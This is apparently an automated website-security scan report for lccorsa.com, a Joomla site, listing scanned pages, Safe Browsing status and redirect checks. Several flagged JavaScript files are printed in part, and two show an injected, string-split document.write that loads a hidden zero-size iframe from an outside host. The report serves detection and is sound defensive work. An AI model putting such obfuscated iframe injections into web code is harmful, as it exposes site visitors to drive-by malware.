Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lccorsa.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://lccorsa.com/ | 200 OK Content-Length: 14328 Content-Type: text/html | clean |
http://lccorsa.com/media/system/js/caption.js | 200 OK Content-Length: 13154 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = document.write('<iframe src="'+'ht'+'tp://2-e.'+'si/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>'); Antivirus reports:
| ||
http://lccorsa.com/components/com_jcomments/js/jcomments-v2.0.js | 200 OK Content-Length: 37692 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function JCommentsEvents(){}
function JCommentsInput(){} function JCommentsIndicator(){this.init();} function JCommentsForm(id,editor){this.init(id,editor);} function JCommentsEditor(textarea,resizable){this.init(textarea,resizable);} function JComments(oi,og,r){this.init(oi,og,r);} JCommentsEvents.prototype = { add: function(o,e,f){if(o.addEventListener){o.addEventListener(e,f,false);return true;}else if(o.attachEvent){var r=o.attachEvent("on"+e,f);retu Antivirus reports:
| ||
http://lccorsa.com/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 15237 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (!window.jtajax) { function jtAJAX() { this.options = {url: '',type: 'post',nocache: true,data: ''}; this.$ = function(id) {if(!id){return null;}var o=document.getElementById(id);if(!o&&document.all){o=document.all[id];}return o;}; this.extend = function(o, e){for(var k in (e||{}))o[k]=e[k];return o;}; this.encode = function(t){return encodeURIComponent(t);}; this.setup = function(options) {this.options = this.extend(this.options, options);}; this Antivirus reports:
| ||
http://lccorsa.com/templates/pulse/lib/scripts/template_scripts.js | 200 OK Content-Length: 17323 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent("load",function(){ var $b = $(document.getElementsByTagName('body')[0]); new SmoothScroll(); Fx.Height = Fx.Style.extend({initialize: function(el, options){this.parent(el, 'height', options);this.element.setStyle('overflow', 'hidden');},toggle: function(){return (this.element.offsetHeight > 0) ? this.custom(this.element.offsetHeight, 0) : this.custom(0, this.element.scrollHeight);},show: function(){return this.set(this.element.scrollHeight);}}); document.write('<iframe src="'+'ht'+'tp://2-e.'+'si/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>'); Antivirus reports:
| ||
http://lccorsa.com/templates/pulse/lib/scripts/menu.php?width=1&height=1&opacity=1&animation=1&speed=180 | 200 OK Content-Length: 2858 Content-Type: text/javascript | clean |
http://lccorsa.com/function.session-start | 404 Not Found Content-Length: 2317 Content-Type: text/html | clean |
http://lccorsa.com/test404page.js | 404 Not Found Content-Length: 2317 Content-Type: text/html | clean |
http://lccorsa.com/./ | 200 OK Content-Length: 14328 Content-Type: text/html | clean |
http://lccorsa.com/./function.session-start | 404 Not Found Content-Length: 2317 Content-Type: text/html | clean |
http://lccorsa.com/index.php?option=com_content&view=category&layout=blog&id=2&Itemid=4&lang=ru | 200 OK Content-Length: 15737 Content-Type: text/html | clean |
http://lccorsa.com/index.php?option=com_content&view=article&id=5&Itemid=5&lang=ru | 200 OK Content-Length: 18091 Content-Type: text/html | clean |
http://lccorsa.com/index.php?option=com_content&view=article&id=4&Itemid=6&lang=ru | 200 OK Content-Length: 13658 Content-Type: text/html | clean |
http://lccorsa.com/index.php?option=com_content&view=article&id=8&Itemid=11&lang=ru | 200 OK Content-Length: 11995 Content-Type: text/html | clean |
http://lccorsa.com/index.php?option=com_content&view=article&id=6&Itemid=7&lang=ru | 200 OK Content-Length: 19964 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lccorsa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Jul 2014 17:28:18 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: lccorsa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Jul 2014 17:28:18 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: lccorsa.com
Referer: http://www.google.com/search?q=lccorsa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lccorsa.com
Referer: http://www.google.com/search?q=lccorsa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.